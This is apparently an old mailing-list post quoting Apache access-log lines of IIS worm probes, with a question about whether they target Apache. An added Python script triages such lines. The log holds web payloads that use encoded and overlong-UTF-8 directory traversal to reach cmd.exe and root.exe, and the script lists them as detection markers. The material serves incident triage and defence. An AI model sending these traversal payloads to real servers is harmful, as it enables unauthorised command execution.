<snipped from /var/log/apache2/access_log>
218.145.25.11 - - [28/Dec/2003:19:40:17 -0500] "GET /scripts/nsiislog.dll HTTP/1.0" 404 286 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:41 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
65.27.204.81 - - [28/Dec/2003:20:34:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
221.13.152.198 - - [30/Dec/2003:04:58:50 -0500] "get /scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir" 501 336 "-" "-"
Is this someone trying to exploit Apache?
Thanks,
Aaron
--
/usr/bin/fortune says:
A woman did what a woman had to, the best way she knew how.
To do more was impossible, to do less, unthinkable.
-- Dirisha, "The Man Who Never Missed"
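Added example, not part of the original post: a small Python triage script for access-log lines like the ones quoted above. It percent-decodes each request path until it stops changing, flags Windows-specific targets, traversal, multiple encoding and overlong UTF-8 bytes, and reports whether a flagged request was actually served. The function names, flag labels and sample lines are this example's own; the sample lines are constructed and use documentation IP addresses.

```python
import re
from urllib.parse import unquote_to_bytes

# Combined Log Format: host ident user [time] "request" status bytes ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) ')
# Markers taken from the requests in the post: Windows paths and binaries.
WINDOWS_MARKERS = (b"cmd.exe", b"root.exe", b"/winnt/", b"nsiislog.dll")

def fully_decode(path, max_rounds=5):
    """Percent-decode until the value stops changing; return (bytes, rounds)."""
    data, rounds = path.encode("latin-1", "replace"), 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    return data, rounds

def triage(line):
    """Return host, status and a list of flags for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    host, request, status = m.group(1), m.group(2), int(m.group(3))
    parts = request.split()
    decoded, rounds = fully_decode(parts[1] if len(parts) > 1 else "")
    flags = []
    if any(marker in decoded.lower() for marker in WINDOWS_MARKERS):
        flags.append("windows-target")
    if re.search(rb"\.\.[\\/]", decoded):
        flags.append("traversal")
    if rounds >= 2:
        flags.append("multi-encoded")
    # 0xC0 and 0xC1 never occur in valid UTF-8; they start overlong forms.
    if b"\xc0" in decoded or b"\xc1" in decoded:
        flags.append("overlong-utf8")
    # Any flagged request answered with 2xx/3xx needs a closer look.
    return {"host": host, "status": status, "flags": flags,
            "served": bool(flags) and status < 400}

# Constructed sample lines modelled on the post (documentation IP addresses).
SAMPLE = [
    '192.0.2.10 - - [28/Dec/2003:20:34:41 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"',
    '192.0.2.10 - - [28/Dec/2003:20:34:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"',
    '192.0.2.11 - - [28/Dec/2003:21:00:00 -0500] "GET /index.html HTTP/1.0" 200 1043 "-" "-"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(triage(entry))
```

A result with `served` set to true is the case to investigate first; flagged requests that end in 4xx or 5xx, like every line in the post, were rejected by the server.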
